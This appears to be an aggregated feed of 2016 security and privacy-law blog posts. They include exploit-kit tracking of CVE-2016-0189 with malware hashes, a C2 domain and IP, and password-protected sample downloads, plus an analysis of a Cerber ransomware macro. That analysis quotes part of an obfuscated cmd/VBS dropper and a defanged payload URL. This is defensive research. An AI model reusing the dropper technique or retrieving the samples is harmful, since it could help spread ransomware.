Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

Enterprise Security Weekly #9 – Sniffing Each Others’ Farts

This week in the news no excuses to go Phish yourself, a services vendor helps you identify risk, the #1 privileged identity management solution (According to some), and a huge blow to the Endpoint Security Agent market. And we'll talk about how to secure your SDLC. All that and more so stay tuned!

Full Show Notes: http://wiki.securityweekly.com/wiki/index.php/ES_Episode8

CVE-2016-0189 (Internet Explorer) and Exploit Kit



Spotted by Symantec in the wild  patched with MS16-051 in may 2016, CVE-2016-0189 is now being integrated in Exploit Kit.

Neutrino Exploit Kit :
Here 2016-07-13 but i am being told that i am late to the party.
It's already [CN] documented here

Neutrino after ScriptJS redirector dropping Locky Affid 13- 2016-07-13


Flash sample in that pass : 85b707cf63abc0f8cfe027153031e853fe452ed02034b792323eecd3bc0f7fd
(Out of topic payload : 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18 - Locky Affid 13 )


Thanks to Malc0de for invaluable help here :)

Files Here: Neutrino_CVE-2016-0189_160714 (Password is malware - VT Link)

Sundown :
Some evidence of CVE-2016-0189 being integrated in Sundown were spotted on jul 15 by @criznash
On the 16th I recorded a pass where the CVE-2016-0189 had his own calls :

Sundown exploiting CVE-2016-0189 to drop Smokebot on the 2016-07-16
(Out of topic payload :  61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1 beaconing to : vicolavicolom.com | 185.93.185.224 )
Files : Sundown_CVE-2016-0189_160716 (password is malware)

RIG:
I saw it on 2016-09-12 but might have appeared before.
RIG successfully exploiting CVE-2016-0189 - 2016-09-12

CVE-2016-0189 from RIG after 3 step decoding pass

Files : RIG_2016-0189_2016-09-12 (password is malware)

Magnitude:
Here pass from 2016-09-16 but is inside since at least 2016-09-04 (Source : Trendmicro - Thanks)

CVE-2016-0189 in Magnitude on 2016-09-16
Sorry i can't share fiddler publicly in that case (Those specific one would give to attack side too much information about some of the technics that can be used - You know how to contact me)

Out of topic Payload:  Cerber
a0d9ad48459933348fc301d8479580f8
5298ca5e9933bd20e051b81371942b2c

GrandSoft:
Spotted first on 2017-09-22 here is traffic from 2018-01-30 on : Win10 Build 10240 - IE11.0.10240.16431 - KB3078071

CVE-2016-0189 in GrandSoft on 2018-01-30
Out of topic Payload:  GandCrab Ransomware
a15c48c74a47e81c1c8b26073be58c64f7ff58717694d60b0b5498274e5d9243

Fiddler here : GrandSoft_WorkingonIE11_Win10d.zip (pass is malware)


Edits :
2016-07-15 a previous version was stating CVE-2015-5122 for nw23. Fixed thanks to @dnpushme
2016-07-20 Adding Sundown.
2016-09-17 Adding RIG
2016-09-19 Adding Magnitude
2018-01-30 Adding GrandSoft (but appeared there on 2017-09-22)

Read More :
Patch Analysis of CVE-2016-0189 - 2016-06-22 - Theori
Neutrino EK: fingerprinting in a Flash - 2016-06-28 - Malwarebytes

Post publication Reading :
Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release - 2016-07-14 - FireEye

FTC Issues Warning Letters to Companies Falsely Claiming APEC CBPR Certification

On July 14, 2016, the Federal Trade Commission issued warning letters to 28 companies relating to apparent false claims of participation in the APEC Cross-Border Privacy Rules (“CBPR”).

The warning letters state that the companies’ websites represent APEC CBPR certification even though the companies do not appear to have undertaken the necessary steps to claim certification, such as a review and approval process by an APEC-recognized Accountability Agent.

The letters further inform the companies that falsely claiming participation in an international privacy program such as the CBPR may subject them to an enforcement action under the FTC’s deception authority pursuant to Section 5 of the FTC Act. The letters also request that the companies remove the apparent misrepresentations or contact the FTC with confirmation that they have, in fact, undergone the appropriate certification process.

This APEC CBPR enforcement initiative follows on the FTC’s May announcement of its first APEC CBPR enforcement matter against a company falsely claiming CBPR certification.

The APEC CBPR system is a regional, multilateral, cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. Currently, the U.S., Mexico, Canada and Japan are participants in the APEC CBPR framework. Other APEC economies are in the process of determining how and when they may join.

A Look at the Cerber Office 365 Ransomware

Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection is through the use of Office macros.

This blog provides an analysis on the Cerber variant using traditional reverse-engineering and ThreatTrack’s newest version of our malware analysis sandbox, ThreatAnalyzer 6.1.

Analyzing Cerber

Reverse engineering in general, more often than not, requires that one gets a broad view as to what the target is doing. Whether you’re analyzing a malware sample or trying to figure what a function does from an obfuscated code, it is best to get the general “feel” of your target before narrowing down to the specifics.

ThreatAnalyzer is a sandbox that executes a program, file or URL in a controlled, monitored environment and provides a detailed report enabling the researcher or analyst to get a good look as to what the sample will do at run time. It is also worth noting that a sandbox is a good tool for generating Threat Intelligence to quickly get IOCs (Indicators of Compromise). The latest version of this sandbox, ThreatAnalyzer 6.1, has a built-in behavioral detection mechanism that enables users to see the general behavior of a sample and based on those particular set of behaviors, predict if the program in question is malicious or benign in nature.

Fig: ThreatAnalyzer’s unique behavior determination engine

Fig: ThreatAnalyzer’s unique behavior determination engine

 

Fig 1: ThreatAnalyzer 6.1 in action

Fig 1: ThreatAnalyzer 6.1 in action

Looking at the figure above, on the analysis screen, ThreatAnalyzer 6.1 has provided the following vital information on this particular sample:

  1. Determine that the sample is detected as malicious on 3 different fronts:
    1. ThreatIQ (our integrated threat intelligence server) observers the sample trying to beacon to blacklisted URLs
    2. The sample is detected by at least 1 or multiple antivirus engine(s)
    3. Based on the behavior that it performed, has a high probability that the sample is malicious
  2. Shows the researcher/user the changes in Registry, IO (File), Network attempts it made, and processes that it spawned
  3. Compacts all detailed information that it has gathered into a downloadable PDF or XML report. If a user chooses, he can download the archive which includes the detailed report, any significant files that was generated, screenshots of the windows spawned and a copy of the PCAP file if any network activities were logged

ThreatAnalyzer also provides a detailed report of the sample you analyzed in XML, JSON or PDF format. These reports contain the processes that were spawned, what files were modified, created or accessed, registries that were manipulated, objects that were created and any network connections that were made.

If we look further at the particular XML file of the sample we analyzed, we can gather the following activities:

  • Spawned WINWORD.EXE (normal since we fed a DOTM file), but the process tree shows that it spawned
    • Cmd.exe
    • Wscript.exe
  • Created a randomly named VBS file in %appdata%
    • %appdata%\15339.vbs
    • Cmd.exe /V /C set “GSI=%APPDATA%\%RANDOM%.vbs” (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()”Seeded another cmd.exe calling the VBS file
  • Made an attempt to connect to
    • httx://solidaritedeproximite.org/mhtr.jpg
  • Made a randomly named .TMP in %appdata% and executed it
    • Hash: ee0828a4e4c195d97313bfc7d4b531f1

These are highly suspicious activities given that we were trying to analyze an Office document file. The behavior above cannot be classified as normal. So the next time you’re nervous on opening an attachment, even if it came from a person or organization you know, feed it to a sandbox like ThreatAnalyzer and have a look before running it on your production machine.

Good ol’ reverse engineering

Office 365 Enable Content

Office 365 Enable Content

Looking at how this ransomware was coded, it will not only infect Office 365 users but users of Office 2007 and above. The macro inside the Document_Open function will auto-execute once the malicious office attachment is opened. But this is also dependent on whether the macro settings is enabled or in earlier Office versions, security is set to low. And quite possibly in an attempt to slow down the analysis process and bypass traditional AV signatures, each iteration of this Cerber macro variant is obfuscated.

Auto-execution macro inside Cerber macro

Auto-execution macro inside Cerber macro

The macro will then proceed to the creation of a script located in %appdata%. The VBS is also obfuscated but luckily not encrypted. It is interesting to note a particular action that may or may not be an intended feature to bypass behavioral detection. It uses the Timer function to generate a random integer and compare it to a self-generated variable, all the while; this action will be the condition when code to download the cryptor component will ensue.

Using built in network features of VBS; it will attempt to connect to a remote server and attempt to download a particular file.

httx://solidaritedeproximite.org/mhtr.jpg

This may seem harmless as it is just a simple JPG file, right? Well, the VBS code also indicates that it will write whatever the contents of that file, save it to a .TMP in %appdata% and execute it. Although this technique has been used by other malware and dates back years ago, this seems interesting.

Download the file, save it, then Run

Download the file, save it, then Run

Md5 Hash: ee0828a4e4c195d97313bfc7d4b531f1

The downloaded file is the cryptor part of the Cerber ransomware. This program is the one responsible for scanning and encrypting target files on a victim’s system. The full analysis of this component will be discussed on a separate blog. It is interesting to note that the downloaded cerber executable will encrypt your files even in the absence of internet connection. The code inside the EXE indicates that it does not connect to a remote server (unlike the ones before it e.g. crytowall, locky, Teslacrypt, etc.) to encrypt the victim’s files.

Once a system is successfully infected it will display the following in the desktop.

And spawn an instance of your browser containing the message:

And play a sound “your documents, photos, databases, and other important files have been encrypted” in a robot voice.

Infection Summary

Flow of the Cerber attack scenario

Flow of the Cerber attack scenario

  1. A spear-phishing email that contains a malicious Office attachment arrives.
  2. If the user opens the email, executed the attachment AND the macro setting for Office is set to enabled, the macro will execute spawning another VBS script.
  3. The script will contact a remote server, downloads and execute the cryptor part of the Cerber ransomware.
  4. Proceeds on scanning and encrypting the user’s files.
  5. Displays a notice that your system has been infected by Cerber ransomware.

The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

European Commission Adopts Privacy Shield

On July 12, 2016, the EU Commissioner for Justice, Consumers and Gender Equality, Věra Jourová, and U.S. Secretary of Commerce Penny Pritzker announced the formal adoption of the EU-U.S. Privacy Shield (the “Privacy Shield”) framework, composed of an Adequacy Decision and accompanying Annexes.

The Privacy Shield is designed to protect the fundamental rights of individuals whose personal data is transferred to the U.S. and ensure legal certainty for businesses with respect to transatlantic transfers of personal data.

The European Commission outlines the following principles of the new framework:

  • Strong obligations on companies handling personal data. The Privacy Shield includes stricter oversight mechanisms to help ensure companies abide by their commitments, including regular monitoring by the U.S. Department of Commerce. The Privacy Shield also includes stricter conditions for onward transfers of personal data to third parties by participating companies.
  • Clear safeguards and transparency obligations on U.S. government access. The European Commission has obtained strong written commitments and assurance from the U.S. government that access to personal data by government authorities for law enforcement, national security and other public interest purposes will be subject to clear conditions, limitations and oversight mechanisms, preventing generalized access and bulk collection of personal data. In addition, a new redress mechanism has been established for EU individuals in the area of national security, through an Ombudsperson within the Department of State. The Ombudsperson will act independently from the U.S. Intelligence Services.
  • Effective protection of individual rights. Individuals who consider that their personal data has been misused under the Privacy Shield framework will benefit from several accessible and affordable dispute resolution mechanisms. These mechanisms include (1) the right for individuals to lodge a complaint directly with the company, (2) free of charge alternative dispute resolution solutions, (3) the right to lodge a complaint with national data protection authorities (the “DPAs”), working in collaboration with the U.S. Federal Trade Commission, and (4) an arbitration mechanism as a last resort.
  • Annual joint review mechanism. The European Commission and the U.S. Department of Commerce will annually monitor the functioning of the Privacy Shield, together with national security experts from the U.S. and European DPAs. The review also will cover the commitments and assurance regarding access to data for law enforcement and national security purposes.

Next Steps

The Adequacy Decision on the protection provided by the Privacy Shield will be notified to the EU Member States today, on July 12, 2016, and will immediately enter into force. In the U.S., the Privacy Shield framework will be published in the Federal Register. Companies will be able to certify with the U.S. Department of Commerce starting August 1, 2016.

The European Commission also will publish a short guide for individuals explaining the available remedies in case an individual thinks that his or her personal data has been misused.

The Article 29 Working Party is currently analyzing the Adequacy Decision in view of its previous Opinion on the Privacy Shield. It will meet on July 25, 2016, to finalize its position on that decision.

Read the European Commission’s Q&A, Factsheet and Press Release.

Read the U.S. Secretary of Commerce’s remarks from the EU-U.S. Privacy Shield Framework Press Conference.

Read the U.S. Department of Commerce’s FAQs, Fact Sheet and Guide on how to join the Privacy Shield.

The Bavarian DPA Issues Paper on Video Surveillance under the GDPR

On July 6, 2016, the Bavarian Data Protection Authority (“DPA”) issued a short paper on video surveillance under the EU General Data Protection Regulation (“GDPR”).

This paper is part of a series of papers that the Bavarian DPA will issue periodically on specific topics of the GDPR to inform the public about what topics are being discussed within the DPA. The DPA emphasized that these papers are non-binding.

The GDPR does not contain specific provisions on video surveillance, contrary to the detailed provisions on video surveillance contained in the German Federal Data Protection Act. Since the GDPR will replace the existing data protection laws in the various EU Member States once it becomes effective in May 2018, the detailed German provisions on video surveillance will cease to exist.

According to the DPA, video surveillance under the GDPR can be legitimized based on the general legal ground of legitimate interest following a balancing test. However, video surveillance will constitute a high-risk processing operation for which a privacy impact assessment (“PIA”) will be necessary, in particular with regard to monitoring publicly accessible areas on a large scale. In addition, appropriate internal records should be kept to document the PIAs as well as the specific data processing activities involved. If a PIA indicates that the processing would result in high-risk that cannot be mitigated (e.g., if mitigation is not technically or practically feasible), the DPA should be consulted prior to the use of the video surveillance system.

According to the DPA, currently, companies are already keeping internal inventories when using video surveillance systems. However, under the GDPR, the DPA advises companies to document each video surveillance system, the purpose of the processing, why it is necessary and proportionate, the risks it presents for individuals and the measures that have been implemented to mitigate those risks.

UK Government Ends NHS Patient Database Scheme

On July 6, 2016, the UK government decided to close its controversial care.data scheme after concerns were raised about the safeguards in place to protect individuals’ health care data and issues with patient transparency.

Under the care.data scheme, all National Health Service (“NHS”) patients’ health care data was held in a central database. The NHS claimed that the program would benefit patients through improved knowledge of drug performance, greater budget efficiencies and an ability to compare regional performance across the UK. Two separate reports reviewing data security generally in the NHS, however, were critical of the safeguards currently in place.

The two reports, one published by Dame Fiona Caldicott, the UK’s National Data Guardian for Health and Care, and the other by the Care Quality Commission, made a number of recommendations to build patient trust, including:

  • a new consent/opt-out model to give people a clear choice about how their personal data is used for purposes outside of their direct care;
  • new data security standards for all organizations handling health and social care information;
  • improved organizational measures, including the provision of training and support to staff, a system of internal audit and external verification and enhanced risk management procedures; and
  • more extensive dialogue with the public about how their information will be used and the benefits of sharing for their own care, for the wider care system and for research purposes.

The care.data scheme was plagued by delays since it was first placed on hold in February 2014, shortly before the first patient records were due to be extracted. While it is unclear whether the NHS will propose an alternative, the UK government has stated its continued aim of realizing the benefits of sharing information.

EU Member States Approve Privacy Shield

On July 8, 2016, EU representatives on the Article 31 Committee approved the final version of the EU-U.S. Privacy Shield (“Privacy Shield”) to permit transatlantic transfers of personal data from the EU to the U.S.

As we previously reported, the Privacy Shield is a successor framework to the Safe Harbor, which was invalidated by the Court of Justice of the European Union in October 2015.

The Article 31 Committee’s approval comes after many months of criticism from various EU bodies of the European Commission’s initial February proposal, including the European Parliament, the Article 29 Working Party and the European Data Protection Supervisor.

Andrus Ansip, Vice President for the Digital Single Market on the European Commission, and Věra Jourová, European Commissioner for Justice, Consumers and Gender Equality, said in a joint statement that “the EU-U.S. Privacy Shield will ensure a high level of protection for individuals and legal certainty for business. It is fundamentally different from the old ‘Safe Harbour’: It imposes clear and strong obligations on companies handling the data and makes sure that these rules are followed and enforced in practice.”

The final seal of approval is expected early next week, with the formal adoption of the Privacy Shield expected on July 12, 2016.

Read Vice President Ansip and Commissioner Jourová’s joint press release.

Second Draft of the Cybersecurity Law Published for Comment in China

On July 5, 2016, the Standing Committee of the National People’s Congress of the People’s Republic of China (the “Standing Committee”) published the full second draft of the Cybersecurity Law (the “second draft”). The publication of the second draft comes after the Standing Committee’s second reading of the draft on June 27, 2016. The public may comment on the second draft of the Cybersecurity Law until August 4, 2016.

The second draft reiterates that network operators should conform to the principles of legality, justice and necessity when collecting personal information, and should expressly inform the data subject of the purpose, method and scope for their collection and use of the information. The second draft also stipulates that network operators are prohibited from providing a user’s personal information to third parties without the user’s consent, except where the personal information is depersonalized in such a way that it cannot identify the individual and the depersonalization cannot be reversed.

The definition of “key information infrastructure” remains unclear in the second draft. According to the second draft, “key information infrastructure” refers to information infrastructure of which damage, malfunction or data leakage would seriously jeopardize national security and the public interest. The State Council will formulate the specific scope of key information infrastructure and the security protection measures for key information infrastructure. Read more information about the second draft.

European Parliament Adopts Directive on Security of Network and Information Systems

On July 6, 2016, the European Parliament adopted the Directive on Security of Network and Information Systems (the “NIS Directive”), which will come into force in August 2016. EU Member States will have 21 months to transpose the NIS Directive into their national laws. The NIS Directive is part of the European Commission’s cybersecurity strategy for the European Union, and is designed to increase cooperation between EU Member States on cybersecurity issues.

The objective of the NIS Directive is to set a common level of security for networks and information systems throughout the European Union. To achieve this objective, EU Member States must:

  • adopt a national strategy on the security of the network and information systems;
  • designate a competent authority to monitor the implementation of the NIS Directive; and
  • designate one or more Computer Security Incident Response Team(s).

A cooperation group composed of representatives from EU Member States will be appointed and will work on providing guidance and sharing information on network security.

At a company level, there will be a risk management and incident reporting obligation to national authorities for operators of “essential services” and digital service providers. Operators of essential services will be identified by EU Member States based on the following criteria: (1) if the entity provides a service which is essential for the maintenance of critical societal/economic activities; (2) the provision of that service depends on network and information systems; and (3) a security incident would have significant disruptive effects on the provision of the essential service. The targeted digital service providers include online marketplaces, cloud computing services and search engines.

The sectors in scope of the NIS Directive include energy, transportation, banking, financial markets, health, water and digital infrastructure. The incidents requiring notification will be assessed according to the following factors: number of users affected, duration of incident, geographic spread, the extent of the disruption of the service and the impact on economic and societal activities.

Going forward, the European Commission will adopt implementing acts with respect to security requirements and notifications obligations of digital service providers within one year of the adoption of the NIS Directive.

EU Commission Signs Agreement with Industry on Cybersecurity

On July 5, 2016, the European Commission announced the launch of a new public-private partnership (the “Partnership”) on cybersecurity, as part of its Digital Single Market and EU Cybersecurity strategies. In this context, the European Commission released several documents, including a Commission Decision establishing a contractual arrangement of the new Partnership for cybersecurity industrial research, and a Staff Working Document on the preparation activities for the Partnership.

The Partnership brings together the European Commission and “cybersecurity market players, represented by the European Cyber Security Organisation, as well as members from national, regional and local public administrations, research centers and academia.” These partners are committed to supporting the development and implementation of research and innovation activities of strategic importance to the European Union’s competitiveness and industrial leadership.

The goals of the Partnership are as follows:

  • Build trust among EU Member States and industrial actors by fostering cooperation during the research and innovation process.
  • Help align the supply and demand sectors for cybersecurity products and services.
  • Seek synergies to develop common, sector-neutral technological building blocks with maximum replication potential.

The Partnership will advise the European Commission on cybersecurity aspects of the future work programs under Horizon 2020 (i.e., the financial instrument implementing the Innovation Union, a Europe 2020 flagship initiative aimed at securing Europe’s global competitiveness), and will also act as a discussion platform between the supply and demand sides of cybersecurity products and solutions. In this context, the Partnership will focus on technical priorities that have been defined previously by the industry that include (1) assurance, security and privacy by design, (2) data security, (3) protection of the ICT infrastructure, (4) identity, access and trust management, and (5) cybersecurity services.

Read the European Commission’s Questions and Answers document.

OCR Enters into First Enforcement Action Against Business Associate

On June 30, 2016, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) announced that it had settled potential HIPAA Security Rule violations with Catholic Health Care Services of the Archdiocese of Philadelphia (“CHCS”). This is the first enforcement action OCR has taken against a business associate since the HIPAA Omnibus Rule was enacted in 2013. The HIPAA Omnibus Rule made business associates directly liable for their violations of the HIPAA rules. The settlement with CHCS is also notable because it involved a breach that affected fewer than 500 individuals.

CHCS acts as a business associate by providing management and information technology services to six nursing homes, which are HIPAA-covered entities. In February 2014, the nursing homes reported a breach of electronic protected health information (“ePHI”) involving a stolen iPhone of a CHCS employee. The iPhone contained large amounts of ePHI of nursing home patients, including Social Security numbers, diagnosis and treatment information, names of patients’ family members and legal guardians, and medication information. The iPhone was neither encrypted nor password-protected.

OCR’s investigation of CHCS found that CHCS, in violation of the HIPAA Security Rule, had failed to (1) conduct an accurate and thorough risk assessment involving ePHI, and (2) implement appropriate security measures sufficient to reduce the risks and vulnerabilities to ePHI to a reasonable and appropriate level.

The resolution agreement requires CHCS to pay a $650,000 settlement to OCR and enter into a Corrective Action Plan that obligates CHCS to:

  • conduct an accurate and thorough risk assessment of the potential risks and vulnerabilities to the confidentiality, integrity and availability of ePHI held by CHCS, and document the security measures to reduce those risks and vulnerabilities to ePHI to a reasonable and appropriate level;
  • develop, maintain and implement written policies and procedures to comply with the requirements of the HIPAA Security Rule;
  • distribute the HIPAA policies and procedures to relevant members of its workforce within 14 days after starting their employment, and obtain certification from those workforce members that they agree to comply with the policies and procedures;
  • report any events of noncompliance with its HIPAA policies and procedures;
  • provide copies of its business associate agreements (“BAAs”) and management service agreements to OCR;
  • provide security training to its workforce; and
  • submit annual compliance reports to OCR for a period of two years.

In the press release accompanying the resolution agreement, OCR Director Jocelyn Samuels stated that “[b]usiness associates must implement the protections of the HIPAA Security Rule for the electronic protected health information they create, receive, maintain, or transmit from covered entities.” Director Samuels also referred to an entity’s risk analysis and risk management plan as “the cornerstones of the HIPAA Security Rule.”

Although this is the first OCR enforcement action against a business associate, the CHCS settlement follows two recent actions that involved the failures of covered entities to enter into BAAs with their service providers that used and disclosed PHI. In April 2016, Raleigh Orthopaedic settled with OCR for $750,000 for improperly disclosing PHI to a third-party service provider without entering into a BAA with that service provider, and in March 2016 North Memorial Health Care of Minnesota settled with OCR for $1.55 million in connection with a breach by its service provider, Accretive Health.

Because a sizable percentage of breaches involve business associates, we should expect more enforcement actions against business associates in the near future.

ICO Releases Annual Report for 2015-2016

On June 28, 2016, the UK Information Commissioner’s Office (“ICO”) released its Annual Report for 2015 -2016 (the “Report”).

According to the Report, the ICO has dealt with an increase in the number of data protection concerns, handling 16,388 complaints in total. Particularly noteworthy is the £130,000 fine imposed on Pharmacy 2U for breach of the fair processing requirements under the UK Data Protection Act 1998. Pharmacy 2U sold details of over 20,000 customers to a list marketing company without customers’ knowledge or consent.

This past year also has seen a rise in the number of incidents reported by companies under the Privacy and Electronic Communications Regulation (“PECR”). This may, in part, be a consequence of the ICO’s mailing campaign to the top lead generation companies. The ICO issued 17 civil monetary penalties under the PECR totaling £1,985,000 to organizations that engaged in a range of unlawful marketing activities; such as nuisance calls.

Christopher Graham, the UK Information Commissioner, has stressed that during the past year the ICO has responded efficiently to unexpected developments, such as the large data breach suffered by Talk Talk, the aftermath of the Schrems decision and the impact on transatlantic data flows, and the consultation regarding the Investigatory Powers Bill in the context of surveillance and security.

The Report highlighted that one of the main challenges for the ICO in the coming years will be to efficiently guide companies in implementing the new EU General Data Protection Regulation and to assess the impact of the UK’s referendum decision to leave the EU on future work in this area.

French Parliament Rejects Data Localization Amendment

On June 30, 2016, a joint committee composed of representatives from both chambers of the French Parliament (“Joint Committee”) reached a common position on the French ‘Digital Republic’ Bill that rejects the data localization amendment previously approved by the French Senate, but significantly amends other aspects of the French Data Protection Act.

No Data Localization Requirement

One of the issues discussed by the Joint Committee was the amendment (corrigendum No. 473) adopted by the French Senate on April 27, 2016. This amendment added a data localization provision to the French Data Protection Act, requiring that personal data be stored in a data center located in the EU and not transferred outside of the EU. The French Government was against this amendment which ignored current and future cross-border data transfer restrictions. Unsurprisingly, the amendment was deleted by the Joint Committee.

Additional Information Requirement

The Joint Committee approved other amendments that anticipate EU General Data Protection Regulation (“GDPR”) requirements. The amendments include the obligation for companies, acting as data controllers, to inform individuals of the data retention period, or if that is not possible, of the criteria used to determine that period. Currently, businesses are not required to specify data retention period(s) in their privacy notices.

Increased Fines

Notably, the ‘Digital Republic’ Bill adopted by the Joint Committee significantly increases the maximum level of fines for violations of the French Data Protection Act. Currently, the French Data Protection Authority (“CNIL”) may impose fines of up to €150,000 for first infringements, or up to €300,000 for repeat infringements. With the new amendment approved by the Joint Committee, the CNIL will be able to immediately impose a fine of up to €3 million until the GDPR becomes applicable. In this respect, the Joint Committee introduced a new provision to confirm that, as of May 25, 2018, the CNIL will impose fines prescribed by the GDPR (i.e., fines of up to, as the case may be, (1) €10 million or 2 percent of annual worldwide turnover, or (2) €20 million or 4 percent of annual worldwide turnover) to the extent that the data processing falls under the scope of the GDPR. For those data processing activities that will not be subject to the GDPR, the CNIL could impose fines of up to €3 million. In this respect, the French Government will present to the French Parliament a report on the amendments to the French Data Protection Act made necessary by the entry into force of the GDPR by June 30, 2017.

Next Steps

The French Digital Republic Bill now needs to be formally adopted by both chambers of the French Parliament.

China Publishes First Regulation Expressly Regulating Mobile Apps

On June 28, 2016, the State Internet Information Office of the People’s Republic of China published the Administrative Provisions on Information Services for Mobile Internet Applications (the “App Administrative Provisions”). This is the first regulation that expressly regulates mobile apps in the People’s Republic of China. Before the App Administrative Provisions were published, the P.R.C. Ministry of Industry and Information Technology had published a draft of the Interim Provisions on the Preinstallation and Management of the Distribution of Mobile Intelligent Terminal Applications (“Interim Provisions”). The comment period for the Interim Provisions draft expired six months ago and i’s still uncertain when it will become effective. According to unofficial statistics, domestic app stores have more than 4 million apps in inventory presently, and the number is growing. Those apps will now become highly regulated products under the App Administrative Provisions.

Most importantly, the App Administrative Provisions expressly requires app providers who provide information services via apps to obtain relevant licenses. Currently, numerous app providers conduct information service businesses without having any license to do so, due to the lack of express laws in this area. With the issuance of the App Administrative Provisions, these app providers will now have to apply for and obtain the relevant licenses, which can include ICP, Internet Culture Operation and/or Internet Publishing Licenses.

Also, according to the App Administrative Provisions, app providers now have obligations relating to information security. For example, app providers are now required to conduct an authentication of the identity of their registered users according to a principle summarized as “real name authentication at the back end, voluntary authentication at the front end.” Also, without the users’ consent, an app provider is required not to collect or use personal information or operate functions which are closely related to the personal information of its users, such as location, contacts and camera. App providers also are required not to produce or publish apps that infringe upon the intellectual property of third parties, and are required to maintain the log-in information of the users of its app on file for 60-days.

Internet Application Store Service Providers (“IASS Providers”) are required to supervise the performance by app providers of their obligations. For example, an IASS Provider is required to file required information about app providers with branches of the governmental Internet Information Offices at the provincial level, and to supervise the app providers’ performance of their obligations. If any app provider violates its obligations, the IASS Provider is required to adopt relevant remedial measures, and file a report with the relevant government agencies.